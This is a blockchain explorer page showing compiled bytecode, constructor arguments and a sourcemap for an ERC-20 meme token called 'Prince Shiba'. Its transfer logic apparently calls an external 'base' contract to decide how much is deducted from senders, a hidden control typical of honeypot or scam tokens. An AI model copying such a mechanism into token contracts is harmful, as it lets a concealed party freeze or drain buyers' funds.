601f19601f820116820180604052508101906107f89190610c8e565b6108029190610ca7565b6001600160a01b038516600090815260016020526040902054906108a4565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108509082610525565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106a39085815260200190565b6000828211156108f65760405162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f77000060448201526064016103f6565b60006109028385610cbe565b949350505050565b6001600160a01b03821661096a5760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016103f6565b60065461097790826108a4565b6006556001600160a01b03821660009081526001602052604090205461099d90826108a4565b6001600160a01b0383166000818152600160205260408082209390935591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109eb9085815260200190565b60405180910390a35050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060078054610a5690610c2b565b80601f0160208091040260200160405190810160405280929190818152602001828054610a8290610c2b565b8015610acf5780601f10610aa457610100808354040283529160200191610acf565b820191906000526020600020905b815481529060010190602001808311610ab257829003601f168201915b5050505050806020019051810190610ae79190610cd1565b905090565b600060208083528351808285015260005b81811015610b1957858101830151858201604001528201610afd565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461039d57600080fd5b60008060408385031215610b6257600080fd5b8235610b6d81610b3a565b946020939093013593505050565b600080600060608486031215610b9057600080fd5b8335610b9b81610b3a565b92506020840135610bab81610b3a565b929592945050506040919091013590565b600060208284031215610bce57600080fd5b5035919050565b600060208284031215610be757600080fd5b813561058481610b3a565b60008060408385031215610c0557600080fd5b8235610c1081610b3a565b91506020830135610c2081610b3a565b809150509250929050565b600181811c90821680610c3f57607f821691505b602082108103610c5f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561030657610306610c65565b600060208284031215610ca057600080fd5b5051919050565b808202811582820484141761030657610306610c65565b8181038181111561030657610306610c65565b600060208284031215610ce357600080fd5b815161058481610b3a56fea2646970667358221220a4a6359fce345e409924e044e5c2ebe3e83808afd49e838c094142e75cb9b51364736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000003b9aca000000000000000000000000000000000000000000000000000000000000000120000000000000000000000000000000000000000000000000000000000000000c5072696e63652053686962610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000550534849420000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000e20f34a832c01d01ce19c8506e292a44dcf4b5c0

-----Decoded View---------------
Arg [0] : name_ (string): Prince Shiba
Arg [1] : symbol_ (string): PSHIB
Arg [2] : decimals_ (uint8): 18
Arg [3] : totalSupply_ (uint256): 1000000000
Arg [4] : base_ (bytes): 0x000000000000000000000000e20f34a832c01d01ce19c8506e292a44dcf4b5c0

-----Encoded View---------------
11 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 000000000000000000000000000000000000000000000000000000003b9aca00
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000120
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000c
Arg [6] : 5072696e63652053686962610000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [8] : 5053484942000000000000000000000000000000000000000000000000000000
Arg [9] : 0000000000000000000000000000000000000000000000000000000000000020
Arg [10] : 000000000000000000000000e20f34a832c01d01ce19c8506e292a44dcf4b5c0


Deployed Bytecode Sourcemap

9710:8599:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17913:81;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11856:156;;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;11856:156:0;1023:187:1;10856:91:0;10927:12;;10856:91;;;1361:25:1;;;1349:2;1334:18;10856:91:0;1215:177:1;12483:264:0;;;;;;:::i;:::-;;:::i;18225:81::-;18289:9;;18225:81;;18289:9;;;;2000:36:1;;1988:2;1973:18;18225:81:0;1858:184:1;13156:206:0;;;;;;:::i;:::-;;:::i;17599:77::-;;;;;;:::i;:::-;;:::i;:::-;;11030:110;;;;;;:::i;:::-;-1:-1:-1;;;;;11114:18:0;11087:7;11114:18;;;:9;:18;;;;;;;11030:110;9054:94;;;:::i;8403:87::-;8449:7;8476:6;8403:87;;-1:-1:-1;;;;;8476:6:0;;;2630:51:1;;2618:2;2603:18;8403:87:0;2484:203:1;18061:85:0;;;:::i;13865:216::-;;;;;;:::i;:::-;;:::i;11353:156::-;;;;;;:::i;:::-;;:::i;11572:137::-;;;;;;:::i;:::-;-1:-1:-1;;;;;11674:18:0;;;11647:7;11674:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11572:137;9303:192;;;;;;:::i;:::-;;:::i;17913:81::-;17950:13;17981:5;17974:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17913:81;:::o;11856:156::-;11929:4;11946:36;11955:10;11967:7;11976:5;11946:8;:36::i;:::-;-1:-1:-1;12000:4:0;11856:156;;;;;:::o;12483:264::-;12580:4;12597:36;12607:6;12615:9;12626:6;12597:9;:36::i;:::-;-1:-1:-1;;;;;12673:19:0;;;;;;:11;:19;;;;;;;;12661:10;12673:31;;;;;;;;;12644:73;;12653:6;;12673:43;;12709:6;12673:35;:43::i;:::-;12644:8;:73::i;:::-;-1:-1:-1;12735:4:0;12483:264;;;;;:::o;13156:206::-;13262:10;13236:4;13283:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;13283:32:0;;;;;;;;;;13236:4;;13253:79;;13274:7;;13283:48;;13320:10;13283:36;:48::i;17599:77::-;17644:24;17650:10;17662:5;17644;:24::i;:::-;17599:77;:::o;9054:94::-;8449:7;8476:6;-1:-1:-1;;;;;8476:6:0;7271:10;8623:23;8615:68;;;;-1:-1:-1;;;8615:68:0;;3672:2:1;8615:68:0;;;3654:21:1;;;3691:18;;;3684:30;3750:34;3730:18;;;3723:62;3802:18;;8615:68:0;;;;;;;;;9119:21:::1;9137:1;9119:9;:21::i;:::-;9054:94::o:0;18061:85::-;18100:13;18131:7;18124:14;;;;;:::i;13865:216::-;13976:10;13950:4;13997:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;13997:32:0;;;;;;;;;;13950:4;;13967:84;;13988:7;;13997:53;;14034:15;13997:36;:53::i;11353:156::-;11422:4;11439:40;11449:10;11461:9;11472:6;11439:9;:40::i;9303:192::-;8449:7;8476:6;-1:-1:-1;;;;;8476:6:0;7271:10;8623:23;8615:68;;;;-1:-1:-1;;;8615:68:0;;3672:2:1;8615:68:0;;;3654:21:1;;;3691:18;;;3684:30;3750:34;3730:18;;;3723:62;3802:18;;8615:68:0;3470:356:1;8615:68:0;-1:-1:-1;;;;;9392:22:0;::::1;9384:73;;;::::0;-1:-1:-1;;;9384:73:0;;4033:2:1;9384:73:0::1;::::0;::::1;4015:21:1::0;4072:2;4052:18;;;4045:30;4111:34;4091:18;;;4084:62;-1:-1:-1;;;4162:18:1;;;4155:36;4208:19;;9384:73:0::1;3831:402:1::0;9384:73:0::1;9468:19;9478:8;9468:9;:19::i;3843:181::-:0;3901:7;;3933:5;3937:1;3933;:5;:::i;:::-;3921:17;;3962:1;3957;:6;;3949:46;;;;-1:-1:-1;;;3949:46:0;;4702:2:1;3949:46:0;;;4684:21:1;4741:2;4721:18;;;4714:30;4780:29;4760:18;;;4753:57;4827:18;;3949:46:0;4500:351:1;3949:46:0;4015:1;3843:181;-1:-1:-1;;;3843:181:0:o;16749:335::-;-1:-1:-1;;;;;16842:19:0;;16834:68;;;;-1:-1:-1;;;16834:68:0;;5058:2:1;16834:68:0;;;5040:21:1;5097:2;5077:18;;;5070:30;5136:34;5116:18;;;5109:62;-1:-1:-1;;;5187:18:1;;;5180:34;5231:19;;16834:68:0;4856:400:1;16834:68:0;-1:-1:-1;;;;;16921:21:0;;16913:68;;;;-1:-1:-1;;;16913:68:0;;5463:2:1;16913:68:0;;;5445:21:1;5502:2;5482:18;;;5475:30;5541:34;5521:18;;;5514:62;-1:-1:-1;;;5592:18:1;;;5585:32;5634:19;;16913:68:0;5261:398:1;16913:68:0;-1:-1:-1;;;;;16994:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:35;;;17045:31;;1361:25:1;;;17045:31:0;;1334:18:1;17045:31:0;;;;;;;;16749:335;;;:::o;14571:510::-;-1:-1:-1;;;;;14669:20:0;;14661:70;;;;-1:-1:-1;;;14661:70:0;;5866:2:1;14661:70:0;;;5848:21:1;5905:2;5885:18;;;5878:30;5944:34;5924:18;;;5917:62;-1:-1:-1;;;5995:18:1;;;5988:35;6040:19;;14661:70:0;5664:401:1;14661:70:0;-1:-1:-1;;;;;14750:23:0;;14742:71;;;;-1:-1:-1;;;14742:71:0;;6272:2:1;14742:71:0;;;6254:21:1;6311:2;6291:18;;;6284:30;6350:34;6330:18;;;6323:62;-1:-1:-1;;;6401:18:1;;;6394:33;6444:19;;14742:71:0;6070:399:1;14742:71:0;14846:102;14931:6;14889:9;:7;:9::i;:::-;14882:46;;-1:-1:-1;;;14882:46:0;;-1:-1:-1;;;;;6704:15:1;;;14882:46:0;;;6686:34:1;6756:15;;;6736:18;;;6729:43;14882:27:0;;;;;;;6621:18:1;;14882:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;:55;;;;:::i;:::-;-1:-1:-1;;;;;14846:17:0;;;;;;:9;:17;;;;;;;:21;:102::i;:::-;-1:-1:-1;;;;;14826:17:0;;;;;;;:9;:17;;;;;;:122;;;;14990:20;;;;;;;:32;;15015:6;14990:24;:32::i;:::-;-1:-1:-1;;;;;14967:20:0;;;;;;;:9;:20;;;;;;;:55;;;;15038:35;;;;;;;;;;15066:6;1361:25:1;;1349:2;1334:18;;1215:177;4299:184:0;4357:7;4390:1;4385;:6;;4377:49;;;;-1:-1:-1;;;4377:49:0;;7347:2:1;4377:49:0;;;7329:21:1;7386:2;7366:18;;;7359:30;7425:32;7405:18;;;7398:60;7475:18;;4377:49:0;7145:354:1;4377:49:0;4437:9;4449:5;4453:1;4449;:5;:::i;:::-;4437:17;4299:184;-1:-1:-1;;;;4299:184:0:o;16003:306::-;-1:-1:-1;;;;;16078:21:0;;16070:67;;;;-1:-1:-1;;;16070:67:0;;7839:2:1;16070:67:0;;;7821:21:1;7878:2;7858:18;;;7851:30;7917:34;7897:18;;;7890:62;-1:-1:-1;;;7968:18:1;;;7961:31;8009:19;;16070:67:0;7637:397:1;16070:67:0;16165:12;;:23;;16182:5;16165:16;:23::i;:::-;16150:12;:38;-1:-1:-1;;;;;16220:18:0;;;;;;:9;:18;;;;;;:29;;16243:5;16220:22;:29::i;:::-;-1:-1:-1;;;;;16199:18:0;;;;;;:9;:18;;;;;;:50;;;;16265:36;;;;;;16295:5;1361:25:1;;1349:2;1334:18;;1215:177;16265:36:0;;;;;;;;16003:306;;:::o;9503:173::-;9559:16;9578:6;;-1:-1:-1;;;;;9595:17:0;;;-1:-1:-1;;;;;;9595:17:0;;;;;;9628:40;;9578:6;;;;;;;9628:40;;9559:16;9628:40;9548:128;9503:173;:::o;17684:111::-;17725:12;17770:5;17759:28;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;17750:37;;17684:111;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2047:180::-;2106:6;2159:2;2147:9;2138:7;2134:23;2130:32;2127:52;;;2175:1;2172;2165:12;2127:52;-1:-1:-1;2198:23:1;;2047:180;-1:-1:-1;2047:180:1:o;2232:247::-;2291:6;2344:2;2332:9;2323:7;2319:23;2315:32;2312:52;;;2360:1;2357;2350:12;2312:52;2399:9;2386:23;2418:31;2443:5;2418:31;:::i;2692:388::-;2760:6;2768;2821:2;2809:9;2800:7;2796:23;2792:32;2789:52;;;2837:1;2834;2827:12;2789:52;2876:9;2863:23;2895:31;2920:5;2895:31;:::i;:::-;2945:5;-1:-1:-1;3002:2:1;2987:18;;2974:32;3015:33;2974:32;3015:33;:::i;:::-;3067:7;3057:17;;;2692:388;;;;;:::o;3085:380::-;3164:1;3160:12;;;;3207;;;3228:61;;3282:4;3274:6;3270:17;3260:27;;3228:61;3335:2;3327:6;3324:14;3304:18;3301:38;3298:161;;3381:10;3376:3;3372:20;3369:1;3362:31;3416:4;3413:1;3406:15;3444:4;3441:1;3434:15;3298:161;;3085:380;;;:::o;4238:127::-;4299:10;4294:3;4290:20;4287:1;4280:31;4330:4;4327:1;4320:15;4354:4;4351:1;4344:15;4370:125;4435:9;;;4456:10;;;4453:36;;;4469:18;;:::i;6783:184::-;6853:6;6906:2;6894:9;6885:7;6881:23;6877:32;6874:52;;;6922:1;6919;6912:12;6874:52;-1:-1:-1;6945:16:1;;6783:184;-1:-1:-1;6783:184:1:o;6972:168::-;7045:9;;;7076;;7093:15;;;7087:22;;7073:37;7063:71;;7114:18;;:::i;7504:128::-;7571:9;;;7592:11;;;7589:37;;;7606:18;;:::i;8039:259::-;8117:6;8170:2;8158:9;8149:7;8145:23;8141:32;8138:52;;;8186:1;8183;8176:12;8138:52;8218:9;8212:16;8237:31;8262:5;8237:31;:::i

Swarm Source

ipfs://a4a6359fce345e409924e044e5c2ebe3e83808afd49e838c094142e75cb9b513
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.